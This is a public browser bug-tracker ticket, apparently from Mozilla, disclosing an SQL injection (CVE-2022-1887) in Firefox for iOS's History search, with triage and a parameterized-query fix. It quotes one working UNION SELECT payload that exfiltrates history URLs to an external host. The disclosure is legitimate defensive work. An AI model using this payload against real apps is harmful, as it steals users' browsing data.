Closed Bug 1767205 (CVE-2022-1887) Opened 3 years ago Closed 3 years ago

SQL injection in History tab on Firefox iOS

Categories

(Firefox for iOS :: General, defect)

Product:
Firefox for iOS
Component:
General
Type:
defect

Tracking

()

Status:
RESOLVED FIXED
Tracking Flags:
Tracking Status
fxios 101 ---

People

(Reporter: sdna.muneaki.nishimura, Assigned: nish.bhasin)

References

(
URL
)

Details

(Keywords: reporter-external, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form])

Attachments

(2 files)

history_sqli.mov
3.94 MB, video/quicktime
Details
advisory.txt
120 bytes, text/plain
Details
Attached video history_sqli.mov

In Firefox iOS, the following SQL query incorporates the variable searchTerm as a string.
https://github.com/mozilla-mobile/firefox-ios/blob/b0efb5ad72289b40d912ae0fa9230b6a524679a0/Storage/SQL/SQLiteHistory.swift#L622
The searchTerm can be specified externally, so SQL injection can be triggered.

The steps to reproduce the injection are below.
(1) Visit https://csrf.jp/2022/fxios/history.php
(2) Tap the link on the page, and the attack payload will be stored in your clipboard
(3) Open History tab from the hamburger menu and tap the magnifying glass icon
(4) Paste the search word from your clipboard, then you can see the following payload in the text input field
a" union select 1,'','https://csrf.jp/2022/fxios/history.php?'||group_concat(media_url), 'Click Me!',1,1,1,1,1 from page_metadata;
(5) One history record that name is "click me!" is shown in the history list
(6) Tap the record, then your history data will be stolen to the malicious page

The attached is a video demonstration of the above attack.

Flags: sec-bounty?
Group: firefox-core-security → mobile-core-security
Component: Security → General
Product: Firefox → Firefox for iOS

Confirming this as a sec-moderate. It is quite bad and we need to fix this, which should be somewhat easy.
The exploit requires user interaction in a somewhat unlikely place, otherwise this could be rated sec-high.

Muneaki: let us know if you manage to improve the attack and we will consider re-evaluating.
Jeremy: Can you help find someone to fix this?

Flags: needinfo?(jeevans)
Keywords: sec-moderate
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form]
Assignee: nobody → nikieme3
Flags: needinfo?(jeevans)

Ticket is now tracked with https://mozilla-hub.atlassian.net/browse/FXIOS-4183 in our JIRA board.

Thanks Laurie for the ticket 🙏

Frederik, we'll bring it in our next sprint but as we discussed this wouldn't change our release cycle and will most likely go out in our next release.

Adding parametrized query to handle injections. Link to PR https://github.com/mozilla-mobile/firefox-ios/pull/10676

Flags: needinfo?(fbraun)

LGTM. Please close this ticket once the fix has landed.

Flags: needinfo?(fbraun)

I have checked that the issue has been fixed in the latest release v100.1. So I think this ticket can be closed.

Status: NEW → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED
Group: mobile-core-security → core-security-release
tracking-fxios: --- → 101
Attached file advisory.txt
Alias: CVE-2022-1887

Hello! Could you make this bug ticket accessible to the public?
As time has passed since the fix and this product is now already secure, I'd like to make this hacktivity details available for anyone to reference.

Flags: needinfo?(dveditz)
Group: core-security-release
Flags: needinfo?(dveditz)
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: